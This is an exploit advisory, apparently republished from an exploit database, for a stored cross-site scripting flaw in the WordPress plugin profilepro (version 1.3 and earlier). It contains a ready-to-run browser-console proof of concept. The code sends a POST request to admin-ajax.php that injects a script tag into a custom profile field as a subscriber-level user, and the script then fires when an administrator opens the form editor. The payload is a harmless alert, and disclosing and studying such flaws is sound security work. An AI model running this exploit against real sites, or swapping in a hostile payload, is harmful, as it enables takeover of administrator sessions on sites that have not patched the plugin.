Share
## https://sploitus.com/exploit?id=PACKETSTORM:180083
# Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting  
# Date: 15-04-2024  
# Exploit Author: Vuln Seeker Cybersecurity Team  
# Vendor Homepage: https://wordpress.org/plugins/profilepro/  
# Version: <= 1.3  
# Tested on: Firefox  
# Contact me: vulns@vulnseeker.org  
  
Description  
  
The plugin does not sanitise and escape some parameters and lacks proper  
access controls, which could allow users with a role as low as subscriber  
to perform Cross-Site Scripting attacks  
  
Proof of Concept  
  
Run the following code from the browser console from the subscriber user  
  
```  
fetch("../wp-admin/admin-ajax.php", {  
method: "POST",  
headers: {  
"Accept": "*/*",  
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
"X-Requested-With": "XMLHttpRequest"  
},  
body:  
"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",  
credentials: "include"  
})  
.then(response => {  
if (!response.ok) {  
throw new Error('Network response was not ok');  
}  
return response.text();  
})  
.then(data => console.log(data))  
.catch(error => console.error('Error:', error));  
```  
  
- As an admin, go to  
http://example.com/wp-admin/edit.php?post_type=profilepro_form  
- Choose the default profile, click on edit and click on add field, XSS  
will pop up.  
  
Reference:  
https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/